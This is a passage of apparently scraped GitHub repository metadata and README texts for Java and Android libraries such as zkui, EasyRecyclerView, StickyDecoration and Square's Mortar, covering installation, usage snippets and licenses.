maven { url ""https://jitpack.io"" }
}
}
dependencies {
compile 'com.github.dongjunkun:DropDownMenu:1.0.4'
}
```
## 使用
添加DropDownMenu 到你的布局文件,如下
```
```
我们只需要在java代码中调用下面的代码
```
//tabs 所有标题,popupViews 所有菜单,contentView 内容
mDropDownMenu.setDropDownMenu(tabs, popupViews, contentView);
```
如果你要了解更多,可以直接看源码 Example
> 建议拷贝代码到项目中使用,拷贝DropDownMenu.java 以及res下的所有文件即可
## 关于我
简书[dongjunkun](http://www.jianshu.com/users/f07458c1a8f3/latest_articles)
"
in28minutes/spring-master-class,master,1126,1451,2017-08-07T06:56:45Z,3461,32,"An updated introduction to the Spring Framework 5. Become an Expert understanding the core features of Spring In Depth. You would write Unit Tests, AOP, JDBC and JPA code during the course. Includes introductions to Spring Boot, JPA, Eclipse, Maven, JUnit and Mockito.",,"# Spring Master Class - Journey from Beginner to Expert
[![Image](https://www.springboottutorial.com/images/Course-Spring-Framework-Master-Class---Beginner-to-Expert.png ""Spring Master Class - Beginner to Expert"")](https://www.udemy.com/course/spring-tutorial-for-beginners/)
Learn the magic of Spring Framework. From IOC (Inversion of Control), DI (Dependency Injection), Application Context to the world of Spring Boot, AOP, JDBC and JPA. Get set for an incredible journey.
### Introduction
Spring Framework remains as popular today as it was when I first used it 12 years back. How is this possible in the incredibly dynamic world where architectures have completely changed?
### What You will learn
- You will learn the basics of Spring Framework - Dependency Injection, IOC Container, Application Context and Bean Factory.
- You will understand how to use Spring Annotations - @Autowired, @Component, @Service, @Repository, @Configuration, @Primary....
- You will understand Spring MVC in depth - DispatcherServlet , Model, Controllers and ViewResolver
- You will use a variety of Spring Boot Starters - Spring Boot Starter Web, Starter Data Jpa, Starter Test
- You will learn the basics of Spring Boot, Spring AOP, Spring JDBC and JPA
- You will learn the basics of Eclipse, Maven, JUnit and Mockito
- You will develop a basic Web application step by step using JSP Servlets and Spring MVC
- You will learn to write unit tests with XML, Java Application Contexts and Mockito
### Requirements
- You should have working knowledge of Java and Annotations.
- We will help you install Eclipse and get up and running with Maven and Tomcat.
### Step Wise Details
Refer each section
## Installing Tools
- Installation Video : https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3
- GIT Repository For Installation : https://github.com/in28minutes/getting-started-in-5-steps
- PDF : https://github.com/in28minutes/SpringIn28Minutes/blob/master/InstallationGuide-JavaEclipseAndMaven_v2.pdf
## Running Examples
- Download the zip or clone the Git repository.
- Unzip the zip file (if you downloaded one)
- Open Command Prompt and Change directory (cd) to folder containing pom.xml
- Open Eclipse
- File -> Import -> Existing Maven Project -> Navigate to the folder where you unzipped the zip
- Select the right project
- Choose the Spring Boot Application file (search for @SpringBootApplication)
- Right Click on the file and Run as Java Application
- You are all Set
- For help : use our installation guide - https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3
### Troubleshooting
- Refer our TroubleShooting Guide - https://github.com/in28minutes/in28minutes-initiatives/tree/master/The-in28Minutes-TroubleshootingGuide-And-FAQ
## Youtube Playlists - 500+ Videos
[Click here - 30+ Playlists with 500+ Videos on Spring, Spring Boot, REST, Microservices and the Cloud](https://www.youtube.com/user/rithustutorials/playlists?view=1&sort=lad&flow=list)
## Keep Learning in28Minutes
in28Minutes is creating amazing solutions for you to learn Spring Boot, Full Stack and the Cloud - Docker, Kubernetes, AWS, React, Angular etc. - [Check out all our courses here](https://github.com/in28minutes/learn)
![in28MinutesLearningRoadmap-July2019.png](https://github.com/in28minutes/in28Minutes-Course-Roadmap/raw/master/in28MinutesLearningRoadmap-July2019.png)
"
DeemOpen/zkui,master,2328,968,2014-05-22T06:15:53Z,493,60,A UI dashboard that allows CRUD operations on Zookeeper.,,"zkui - Zookeeper UI Dashboard
====================
A UI dashboard that allows CRUD operations on Zookeeper.
Requirements
====================
Requires Java 7 to run.
Setup
====================
1. mvn clean install
2. Copy the config.cfg to the folder with the jar file. Modify it to point to the zookeeper instance. Multiple zk instances are coma separated. eg: server1:2181,server2:2181. First server should always be the leader.
3. Run the jar. ( nohup java -jar zkui-2.0-SNAPSHOT-jar-with-dependencies.jar & )
4. http://localhost:9090
Login Info
====================
username: admin, pwd: manager (Admin privileges, CRUD operations supported)
username: appconfig, pwd: appconfig (Readonly privileges, Read operations supported)
You can change this in the config.cfg
Technology Stack
====================
1. Embedded Jetty Server.
2. Freemarker template.
3. H2 DB.
4. Active JDBC.
5. JSON.
6. SLF4J.
7. Zookeeper.
8. Apache Commons File upload.
9. Bootstrap.
10. Jquery.
11. Flyway DB migration.
Features
====================
1. CRUD operation on zookeeper properties.
2. Export properties.
3. Import properties via call back url.
4. Import properties via file upload.
5. History of changes + Path specific history of changes.
6. Search feature.
7. Rest API for accessing Zookeeper properties.
8. Basic Role based authentication.
9. LDAP authentication supported.
10. Root node /zookeeper hidden for safety.
11. ACL supported global level.
Import File Format
====================
# add property
/appconfig/path=property=value
# remove a property
-/path/property
You can either upload a file or specify a http url of the version control system that way all your zookeeper changes will be in version control.
Export File Format
====================
/appconfig/path=property=value
You can export a file and then use the same format to import.
SOPA/PIPA BLACKLISTED VALUE
====================
All password will be displayed as SOPA/PIPA BLACKLISTED VALUE for a normal user. Admins will be able to view and edit the actual value upon login.
Password will be not shown on search / export / view for normal user.
For a property to be eligible for black listing it should have (PWD / pwd / PASSWORD / password) in the property name.
LDAP
====================
If you want to use LDAP authentication provide the ldap url. This will take precedence over roleSet property file authentication.
ldapUrl=ldap://:/dc=mycom,dc=com
If you dont provide this then default roleSet file authentication will be used.
REST call
====================
A lot of times you require your shell scripts to be able to read properties from zookeeper. This can now be achieved with a http call. Password are not exposed via rest api for security reasons. The rest call is a read only operation requiring no authentication.
Eg:
http://localhost:9090/acd/appconfig?propNames=foo&host=myhost.com
This will first lookup the host name under /appconfig/hosts and then find out which path the host point to. Then it will look for the property under that path.
There are 2 additional properties that can be added to give better control.
cluster=cluster1
http://localhost:9090/acd/appconfig?propNames=foo&cluster=cluster1&host=myhost.com
In this case the lookup will happen on lookup path + cluster1.
app=myapp
http://localhost:9090/acd/appconfig?propNames=foo&app=myapp&host=myhost.com
In this case the lookup will happen on lookup path + myapp.
A shell script will call this via
MY_PROPERTY=""$(curl -f -s -S -k ""http://localhost:9090/acd/appconfig?propNames=foo&host=`hostname -f`"" | cut -d '=' -f 2)""
echo $MY_PROPERTY
Standardization
====================
Zookeeper doesnt enforce any order in which properties are stored and retrieved. ZKUI however organizes properties in the following manner for easy lookup.
Each server/box has its hostname listed under /appconfig/hosts and that points to the path where properties reside for that path. So when the lookup for a property occurs over a rest call it first finds the hostname entry under /appconfig/hosts and then looks for that property in the location mentioned.
eg: /appconfig/hosts/myserver.com=/appconfig/dev/app1
This means that when myserver.com tries to lookup the propery it looks under /appconfig/dev/app1
You can also append app name to make lookup easy.
eg: /appconfig/hosts/myserver.com:testapp=/appconfig/dev/test/app1
eg: /appconfig/hosts/myserver.com:prodapp=/appconfig/dev/prod/app1
Lookup can be done by grouping of app and cluster. A cluster can have many apps under it. When the bootloader entry looks like this /appconfig/hosts/myserver.com=/appconfig/dev the rest lookup happens on the following paths.
/appconfig/dev/..
/appconfig/dev/hostname..
/appconfig/dev/app..
/appconfig/dev/cluster..
/appconfig/dev/cluster/app..
This standardization is only needed if you choose to use the rest lookup. You can use zkui to update properties in general without worry about this organizing structure.
HTTPS
====================
You can enable https if needed.
keytool -keystore keystore -alias jetty -genkey -keyalg RSA
Limitations
====================
1. ACLs are fully supported but at a global level.
Screenshots
====================
Basic Role Based Authentication
Dashboard Console
CRUD Operations
Import Feature
Track History of changes
Status of Zookeeper Servers
License & Contribution
====================
ZKUI is released under the Apache 2.0 license. Comments, bugs, pull requests, and other contributions are all welcomed!
Thanks to Jozef Krajčovič for creating the logo which has been used in the project.
https://www.iconfinder.com/iconsets/origami-birds
"
Jude95/EasyRecyclerView,master,2029,458,2015-07-18T13:11:48Z,11336,110,"ArrayAdapter,pull to refresh,auto load more,Header/Footer,EmptyView,ProgressView,ErrorView",,"# EasyRecyclerView
[中文](https://github.com/Jude95/EasyRecyclerView/blob/master/README_ch.md) | [English](https://github.com/Jude95/EasyRecyclerView/blob/master/README.md)
Encapsulate many API about RecyclerView into the library,such as arrayAdapter,pull to refresh,auto load more,no more and error in the end,header&footer.
The library uses a new usage of ViewHolder,decoupling the ViewHolder and Adapter.
Adapter will do less work,adapter only direct the ViewHolder,if you use MVP,you can put adapter into presenter.ViewHolder only show the item,then you can use one ViewHolder for many Adapter.
Part of the code modified from [Malinskiy/SuperRecyclerView](https://github.com/Malinskiy/SuperRecyclerView),make more functions handed by Adapter.
# Dependency
```groovy
compile 'com.jude:easyrecyclerview:4.4.2'
```
# ScreenShot
![recycler.gif](recycler3.gif)
# Usage
## EasyRecyclerView
```xml
```
**Attention** EasyRecyclerView is not a RecyclerView just contain a RecyclerView.use 'getRecyclerView()' to get the RecyclerView;
**EmptyView&LoadingView&ErrorView**
xml:
```xml
app:layout_empty=""@layout/view_empty""
app:layout_progress=""@layout/view_progress""
app:layout_error=""@layout/view_error""
```
code:
```java
void setEmptyView(View emptyView)
void setProgressView(View progressView)
void setErrorView(View errorView)
```
then you can show it by this whenever:
```java
void showEmpty()
void showProgress()
void showError()
void showRecycler()
```
**scrollToPosition**
```java
void scrollToPosition(int position); // such as scroll to top
```
**control the pullToRefresh**
```java
void setRefreshing(boolean isRefreshing);
void setRefreshing(final boolean isRefreshing, final boolean isCallback); //second params is callback immediately
```
##RecyclerArrayAdapter
there is no relation between RecyclerArrayAdapter and EasyRecyclerView.you can user any Adapter for the EasyRecyclerView,and use the RecyclerArrayAdapter for any RecyclerView.
**Data Manage**
```java
void add(T object);
void addAll(Collection extends T> collection);
void addAll(T ... items);
void insert(T object, int index);
void update(T object, int index);
void remove(T object);
void clear();
void sort(Comparator super T> comparator);
```
**Header&Footer**
```java
void addHeader(ItemView view)
void addFooter(ItemView view)
```
ItemView is not a view but a view creator;
```java
public interface ItemView {
View onCreateView(ViewGroup parent);
void onBindView(View itemView);
}
```
The onCreateView and onBindView correspond the callback in RecyclerView's Adapter,so adapter will call `onCreateView` once and `onBindView` more than once;
It recommend that add the ItemView to Adapter after the data is loaded,initialization View in onCreateView and nothing in onBindView.
Header and Footer support `LinearLayoutManager`,`GridLayoutManager`,`StaggeredGridLayoutManager`.
In `GridLayoutManager` you must add this:
```java
//make adapter obtain a LookUp for LayoutManager,param is maxSpan。
gridLayoutManager.setSpanSizeLookup(adapter.obtainGridSpanSizeLookUp(2));
```
**OnItemClickListener&OnItemLongClickListener**
```java
adapter.setOnItemClickListener(new RecyclerArrayAdapter.OnItemClickListener() {
@Override
public void onItemClick(int position) {
//position not contain Header
}
});
adapter.setOnItemLongClickListener(new RecyclerArrayAdapter.OnItemLongClickListener() {
@Override
public boolean onItemLongClick(int position) {
return true;
}
});
```
equal 'itemview.setOnClickListener()' in ViewHolder.
if you set listener after RecyclerView has layout.you should use 'notifyDataSetChange()';
###the API below realized by add a Footer。
**LoadMore**
```java
void setMore(final int res,OnMoreListener listener);
void setMore(final View view,OnMoreListener listener);
```
Attention when you add null or the length of data you add is 0 ,it will finish LoadMore and show NoMore;
also you can show NoMore manually `adapter.stopMore();`
**LoadError**
```java
void setError(final int res,OnErrorListener listener)
void setError(final View view,OnErrorListener listener)
```
use `adapter.pauseMore()` to show Error,when your loading throw an error;
if you add data when showing Error.it will resume to load more;
when the ErrorView display to screen again,it will resume to load more too,and callback the OnLoadMoreListener(retry).
`adapter.resumeMore()`you can resume to load more manually,it will callback the OnLoadMoreListener immediately.
you can put resumeMore() into the OnClickListener of ErrorView to realize click to retry.
**NoMore**
```java
void setNoMore(final int res,OnNoMoreListener listener)
void setNoMore(final View view,OnNoMoreListener listener)
```
when loading is finished(add null or empty or stop manually),it while show in the end.
## BaseViewHolder\
decoupling the ViewHolder and Adapter,new ViewHolder in Adapter and inflate view in ViewHolder.
Example:
```java
public class PersonViewHolder extends BaseViewHolder {
private TextView mTv_name;
private SimpleDraweeView mImg_face;
private TextView mTv_sign;
public PersonViewHolder(ViewGroup parent) {
super(parent,R.layout.item_person);
mTv_name = $(R.id.person_name);
mTv_sign = $(R.id.person_sign);
mImg_face = $(R.id.person_face);
}
@Override
public void setData(final Person person){
mTv_name.setText(person.getName());
mTv_sign.setText(person.getSign());
mImg_face.setImageURI(Uri.parse(person.getFace()));
}
}
-----------------------------------------------------------------------
public class PersonAdapter extends RecyclerArrayAdapter {
public PersonAdapter(Context context) {
super(context);
}
@Override
public BaseViewHolder OnCreateViewHolder(ViewGroup parent, int viewType) {
return new PersonViewHolder(parent);
}
}
```
## Decoration
Now there are three commonly used decoration provide for you.
**DividerDecoration**
Usually used in LinearLayoutManager.add divider between items.
```java
DividerDecoration itemDecoration = new DividerDecoration(Color.GRAY, Util.dip2px(this,0.5f), Util.dip2px(this,72),0);//color & height & paddingLeft & paddingRight
itemDecoration.setDrawLastItem(true);//sometimes you don't want draw the divider for the last item,default is true.
itemDecoration.setDrawHeaderFooter(false);//whether draw divider for header and footer,default is false.
recyclerView.addItemDecoration(itemDecoration);
```
this is the demo:
**SpaceDecoration**
Usually used in GridLayoutManager and StaggeredGridLayoutManager.add space between items.
```java
SpaceDecoration itemDecoration = new SpaceDecoration((int) Utils.convertDpToPixel(8,this));//params is height
itemDecoration.setPaddingEdgeSide(true);//whether add space for left and right adge.default is true.
itemDecoration.setPaddingStart(true);//whether add top space for the first line item(exclude header).default is true.
itemDecoration.setPaddingHeaderFooter(false);//whether add space for header and footer.default is false.
recyclerView.addItemDecoration(itemDecoration);
```
this is the demo:
**StickHeaderDecoration**
Group the items,add a GroupHeaderView for each group.The usage of StickyHeaderAdapter is the same with RecyclerView.Adapter.
this part is modified from [edubarr/header-decor](https://github.com/edubarr/header-decor)
```java
StickyHeaderDecoration decoration = new StickyHeaderDecoration(new StickyHeaderAdapter(this));
decoration.setIncludeHeader(false);
recyclerView.addItemDecoration(decoration);
```
for example:
**for detail,see the demo**
License
-------
Copyright 2015 Jude
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
hanks-zyh/SmallBang,master,1005,158,2015-12-24T14:48:37Z,6379,6, twitter like animation for any view :heartbeat:,animation heartbeat like-button twitter,"# SmallBang
twitter like animation for any view :heartbeat:
[Demo APK](https://github.com/hanks-zyh/SmallBang/blob/master/screenshots/demo.apk?raw=true)
## Usage
```groovy
dependencies {
implementation 'pub.hanks:smallbang:1.2.2'
}
```
```xml
```
or
```xml
```
## Donate
If this project help you reduce time to develop, you can give me a cup of coffee :)
[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UGENU2RU26RUG)
## Contact & Help
Please fell free to contact me if there is any problem when using the library.
- **email**: zhangyuhan2014@gmail.com
- **twitter**: https://twitter.com/zhangyuhan3030
- **weibo**: http://weibo.com/hanksZyh
- **blog**: http://hanks.pub
welcome to commit [issue](https://github.com/hanks-zyh/SmallBang/issues) & [pr](https://github.com/hanks-zyh/SmallBang/pulls)
---
## License
This library is licensed under the [Apache Software License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
See [`LICENSE`](LICENSE) for full of the license text.
Copyright (C) 2015 [Hanks](https://github.com/hanks-zyh)
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"
Gavin-ZYX/StickyDecoration,master,1033,165,2017-05-31T07:38:49Z,1018,3,,,"# StickyDecoration
利用`RecyclerView.ItemDecoration`实现顶部悬浮效果
![效果](http://upload-images.jianshu.io/upload_images/1638147-89986d7141741cdf.gif?imageMogr2/auto-orient/strip)
## 支持
- **LinearLayoutManager**
- **GridLayoutManager**
- **点击事件**
- **分割线**
## 添加依赖
项目要求: `minSdkVersion` >= 14.
在你的`build.gradle`中 :
```gradle
repositories {
maven { url 'https://jitpack.io' }
}
dependencies {
compile 'com.github.Gavin-ZYX:StickyDecoration:1.6.1'
}
```
**最新版本**
[![](https://jitpack.io/v/Gavin-ZYX/StickyDecoration.svg)](https://jitpack.io/#Gavin-ZYX/StickyDecoration)
## 使用
#### 文字悬浮——StickyDecoration
> **注意**
使用recyclerView.addItemDecoration()之前,必须先调用recyclerView.setLayoutManager();
代码:
```java
GroupListener groupListener = new GroupListener() {
@Override
public String getGroupName(int position) {
//获取分组名
return mList.get(position).getProvince();
}
};
StickyDecoration decoration = StickyDecoration.Builder
.init(groupListener)
//重置span(使用GridLayoutManager时必须调用)
//.resetSpan(mRecyclerView, (GridLayoutManager) manager)
.build();
...
mRecyclerView.setLayoutManager(manager);
//需要在setLayoutManager()之后调用addItemDecoration()
mRecyclerView.addItemDecoration(decoration);
```
效果:
![LinearLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-f3c2cbe712aa65fb.gif?imageMogr2/auto-orient/strip)
![GridLayoutManager](http://upload-images.jianshu.io/upload_images/1638147-e5e0374c896110d0.gif?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
**支持的方法:**
| 方法 | 功能 | 默认 |
|-|-|-|
| setGroupBackground | 背景色 | #48BDFF |
| setGroupHeight | 高度 | 120px |
| setGroupTextColor | 字体颜色 | Color.WHITE |
| setGroupTextSize | 字体大小 | 50px |
| setDivideColor | 分割线颜色 | #CCCCCC |
| setDivideHeight | 分割线高宽度 | 0 |
| setTextSideMargin | 边距(靠左时为左边距 靠右时为右边距) | 10 |
| setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 |
| setSticky | 是否需要吸顶效果 | true |
|方法|功能|描述|
|-|-|-|
| setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position |
| resetSpan | 重置 | 使用GridLayoutManager时必须调用 |
### 自定义View悬浮——PowerfulStickyDecoration
先创建布局`item_group`
```xml
```
创建`PowerfulStickyDecoration`,实现自定`View`悬浮
```java
PowerGroupListener listener = new PowerGroupListener() {
@Override
public String getGroupName(int position) {
return mList.get(position).getProvince();
}
@Override
public View getGroupView(int position) {
//获取自定定义的组View
View view = getLayoutInflater().inflate(R.layout.item_group, null, false);
((TextView) view.findViewById(R.id.tv)).setText(mList.get(position).getProvince());
return view;
}
};
PowerfulStickyDecoration decoration = PowerfulStickyDecoration.Builder
.init(listener)
//重置span(注意:使用GridLayoutManager时必须调用)
//.resetSpan(mRecyclerView, (GridLayoutManager) manager)
.build();
...
mRecyclerView.addItemDecoration(decoration);
```
效果:
![效果](http://upload-images.jianshu.io/upload_images/1638147-3fed255296a6c3db.gif?imageMogr2/auto-orient/strip)
**支持的方法:**
| 方法 | 功能 | 默认 |
| -- | -- | -- |
| setGroupHeight | 高度 | 120px |
| setGroupBackground | 背景色 | #48BDFF |
| setDivideColor | 分割线颜色 | #CCCCCC |
| setDivideHeight | 分割线高宽度 | 0 |
| setCacheEnable | 是否使用缓存| 使用缓存 |
| setHeaderCount | 头部Item数量(仅LinearLayoutManager) | 0 |
| setSticky | 是否需要吸顶效果 | true |
|方法|功能|描述|
|-|-|-|
| setOnClickListener | 点击事件 | 设置点击事件,返回当前分组下第一个item的position以及对应的viewId |
| resetSpan | 重置span |使用GridLayoutManager时必须调用 |
| notifyRedraw | 通知重新绘制 | 使用场景:网络图片加载后调用方法使用) |
| clearCache | 清空缓存 | 在使用缓存的情况下,数据改变时需要清理缓存 |
**Tips**
1、若使用网络图片时,在图片加载完成后需要调用
```java
decoration.notifyRedraw(mRv, view, position);
```
2、使用缓存时,若数据源改变,需要调用clearCache清除数据
3、点击事件穿透问题,参考demo中MyRecyclerView。[issue47](https://github.com/Gavin-ZYX/StickyDecoration/issues/37)
# 更新日志
----------------------------- 1.6.0 (2022-8-21)----------------------------
- fix:取消缓存无效问题
- 迁移仓库
- 迁移到Androidx
----------------------------- 1.5.3 (2020-12-15)----------------------------
- 支持是否需要吸顶效果
----------------------------- 1.5.2 (2019-9-3)----------------------------
- fix:特殊情况下,吸顶效果不佳问题
----------------------------- 1.5.1 (2019-8-8)----------------------------
- fix:setHeaderCount导致显示错乱问题
----------------------------- 1.5.0 (2019-6-17)----------------------------
- fix:GridLayoutManager刷新后数据混乱问题
----------------------------- 1.4.12 (2019-5-8)----------------------------
- fix:setDivideColor不生效问题
----------------------------- 1.4.9 (2018-10-9)----------------------------
- fix:由于添加header导致的一些问题
----------------------------- 1.4.8 (2018-08-26)----------------------------
- 顶部悬浮栏点击事件穿透问题:提供处理方案
----------------------------- 1.4.7 (2018-08-16)----------------------------
- fix:数据变化后,布局未刷新问题
----------------------------- 1.4.6 (2018-07-29)----------------------------
- 修改缓存方式
- 加入性能检测
----------------------------- 1.4.5 (2018-06-17)----------------------------
- 在GridLayoutManager中使用setHeaderCount方法导致布局错乱问题
----------------------------- 1.4.4 (2018-06-2)----------------------------
- 添加setHeaderCount方法
- 修改README
- 修复bug
----------------------------- 1.4.3 (2018-05-27)----------------------------
- 修复一些bug,更改命名
----------------------------- 1.4.2 (2018-04-2)----------------------------
- 增强点击事件,现在可以得到悬浮条内View点击事件(没有设置id时,返回View.NO_ID)
- 修复加载更多返回null崩溃或出现多余的悬浮Item问题(把加载更多放在Item中的加载方式)
----------------------------- 1.4.1 (2018-03-21)----------------------------
- 默认取消缓存,避免数据改变时显示出问题
- 添加clearCache方法用于清理缓存
----------------------------- 1.4.0 (2018-03-04)----------------------------
- 支持异步加载后的重新绘制(如网络图片加载)
- 优化缓存
- 优化GridLayoutManager的分割线
----------------------------- 1.3.1 (2018-01-30)----------------------------
- 修改测量方式
----------------------------- 1.3.0 (2018-01-28)----------------------------
- 删除isAlignLeft()方法,需要靠右时,直接在布局中处理就可以了。
- 优化缓存机制。
"
square/mortar,master,2159,159,2013-11-09T00:01:50Z,884,33,"A simple library that makes it easy to pair thin views with dedicated controllers, isolated from most of the vagaries of the Activity life cycle.",,"# Mortar
## Deprecated
Mortar had a good run and served us well, but new use is strongly discouraged. The app suite at Square that drove its creation is in the process of replacing Mortar with [Square Workflow](https://square.github.io/workflow/).
## What's a Mortar?
Mortar provides a simplified, composable overlay for the Android lifecycle,
to aid in the use of [Views as the modular unit of Android applications][rant].
It leverages [Context#getSystemService][services] to act as an a la carte supplier
of services like dependency injection, bundle persistence, and whatever else
your app needs to provide itself.
One of the most useful services Mortar can provide is its [BundleService][bundle-service],
which gives any View (or any object with access to the Activity context) safe access to
the Activity lifecycle's persistence bundle. For fans of the [Model View Presenter][mvp]
pattern, we provide a persisted [Presenter][presenter] class that builds on BundleService.
Presenters are completely isolated from View concerns. They're particularly good at
surviving configuration changes, weathering the storm as Android destroys your portrait
Activity and Views and replaces them with landscape doppelgangers.
Mortar can similarly make [Dagger][dagger] ObjectGraphs (or [Dagger2][dagger2]
Components) visible as system services. Or not — these services are
completely decoupled.
Everything is managed by [MortarScope][scope] singletons, typically
backing the top level Application and Activity contexts. You can also spawn
your own shorter lived scopes to manage transient sessions, like the state of
an object being built by a set of wizard screens.
These nested scopes can shadow the services provided by higher level scopes.
For example, a [Dagger extension graph][ogplus] specific to your wizard session
can cover the one normally available, transparently to the wizard Views.
Calls like `ObjectGraphService.inject(getContext(), this)` are now possible
without considering which graph will do the injection.
## The Big Picture
An application will typically have a singleton MortarScope instance.
Its job is to serve as a delegate to the app's `getSystemService` method, something like:
```java
public class MyApplication extends Application {
private MortarScope rootScope;
@Override public Object getSystemService(String name) {
if (rootScope == null) rootScope = MortarScope.buildRootScope().build(getScopeName());
return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name);
}
}
```
This exposes a single, core service, the scope itself. From the scope you can
spawn child scopes, and you can register objects that implement the
[Scoped](https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Scoped.java#L18)
interface with it for setup and tear-down calls.
* `Scoped#onEnterScope(MortarScope)`
* `Scoped#onExitScope(MortarScope)`
To make a scope provide other services, like a [Dagger ObjectGraph][og],
you register them while building the scope. That would make our Application's
`getSystemService` method look like this:
```java
@Override public Object getSystemService(String name) {
if (rootScope == null) {
rootScope = MortarScope.buildRootScope()
.with(ObjectGraphService.SERVICE_NAME, ObjectGraph.create(new RootModule()))
.build(getScopeName());
}
return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name);
}
```
Now any part of our app that has access to a `Context` can inject itself:
```java
public class MyView extends LinearLayout {
@Inject SomeService service;
public MyView(Context context, AttributeSet attrs) {
super(context, attrs);
ObjectGraphService.inject(context, this);
}
}
```
To take advantage of the BundleService describe above, you'll put similar code
into your Activity. If it doesn't exist already, you'll
build a sub-scope to back the Activity's `getSystemService` method, and
while building it set up the `BundleServiceRunner`. You'll also notify
the BundleServiceRunner each time `onCreate` and `onSaveInstanceState` are
called, to make the persistence bundle available to the rest of the app.
```java
public class MyActivity extends Activity {
private MortarScope activityScope;
@Override public Object getSystemService(String name) {
MortarScope activityScope = MortarScope.findChild(getApplicationContext(), getScopeName());
if (activityScope == null) {
activityScope = MortarScope.buildChild(getApplicationContext()) //
.withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner())
.withService(HelloPresenter.class.getName(), new HelloPresenter())
.build(getScopeName());
}
return activityScope.hasService(name) ? activityScope.getService(name)
: super.getSystemService(name);
}
@Override protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
BundleServiceRunner.getBundleServiceRunner(this).onCreate(savedInstanceState);
setContentView(R.layout.main_view);
}
@Override protected void onSaveInstanceState(Bundle outState) {
super.onSaveInstanceState(outState);
BundleServiceRunner.getBundleServiceRunner(this).onSaveInstanceState(outState);
}
}
```
With that in place, any object in your app can sign up with the `BundleService`
to save and restore its state. This is nice for views, since Bundles are less
of a hassle than the `Parcelable` objects required by `View#onSaveInstanceState`,
and a boon to any business objects in the rest of your app.
Download
--------
Download [the latest JAR][jar] or grab via Maven:
```xml
com.squareup.mortarmortar(insert latest version)
```
Gradle:
```groovy
compile 'com.squareup.mortar:mortar:(latest version)'
```
## Full Disclosure
This stuff has been in ""rapid"" development over a pretty long gestation period,
but is finally stabilizing. We don't expect drastic changes before cutting a
1.0 release, but we still cannot promise a stable API from release to release.
Mortar is a key component of multiple Square apps, including our flagship
[Square Register][register] app.
License
--------
Copyright 2013 Square, Inc.
Licensed under the Apache License, Version 2.0 (the ""License"");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an ""AS IS"" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
[bundle-service]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/bundler/BundleService.java
[mvp]: http://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter
[dagger]: http://square.github.io/dagger/
[dagger2]: http://google.github.io/dagger/
[jar]: http://repository.sonatype.org/service/local/artifact/maven/redirect?r=central-proxy&g=com.squareup.mortar&a=mortar&v=LATEST
[og]: https://square.github.io/dagger/1.x/dagger/dagger/ObjectGraph.html
[ogplus]: https://github.com/square/dagger/blob/dagger-parent-1.1.0/core/src/main/java/dagger/ObjectGraph.java#L96
[presenter]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Presenter.java
[rant]: http://corner.squareup.com/2014/10/advocating-against-android-fragments.html
[register]: https://play.google.com/store/apps/details?id=com.squareup
[scope]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/MortarScope.java
[services]: http://developer.android.com/reference/android/content/Context.html#getSystemService(java.lang.String)
"
joyoyao/superCleanMaster,master,1898,884,2015-02-12T03:37:41Z,12302,18,[DEPRECATED] ,,"# superCleanMaster
superCleanMaster is deprecated Thanks for all your support!
"
frogermcs/GithubClient,master,1204,221,2015-05-27T16:43:03Z,190,17,Example of Github API client implemented on top of Dagger 2 DI framework. ,,"# GithubClient
Example of Github API client implemented on top of Dagger 2 DI framework.
This code was created as an example for Dependency Injection with Dagger 2 series on my dev-blog:
- [Introdution to Dependency Injection](http://frogermcs.github.io/dependency-injection-with-dagger-2-introdution-to-di/)
- [Dagger 2 API](http://frogermcs.github.io/dependency-injection-with-dagger-2-the-api/)
- [Dagger 2 - custom scopes](http://frogermcs.github.io/dependency-injection-with-dagger-2-custom-scopes/)
- [Dagger 2 - graph creation performance](http://frogermcs.github.io/dagger-graph-creation-performance/)
- [Dependency injection with Dagger 2 - Producers](http://frogermcs.github.io/dependency-injection-with-dagger-2-producers/)
- [Inject everything - ViewHolder and Dagger 2 (with Multibinding and AutoFactory example)](http://frogermcs.github.io/inject-everything-viewholder-and-dagger-2-example/)
This code was originally prepared for my presentation at Google I/O Extended 2015 in Tech Space Cracow. http://www.meetup.com/GDG-Krakow/events/221822600/
"
sirthias/pegdown,master,1285,218,2010-04-30T11:44:16Z,11716,84,A pure-Java Markdown processor based on a parboiled PEG parser supporting a number of extensions,,
zalando/logbook,main,1707,258,2015-09-14T15:29:12Z,6267,30,An extensible Java library for HTTP request and response logging,client-side http-logs java logbook logger logging logs monitoring observability plugin-extension request-response server-side spring-boot spring-boot-starter,"# Logbook: HTTP request and response logging
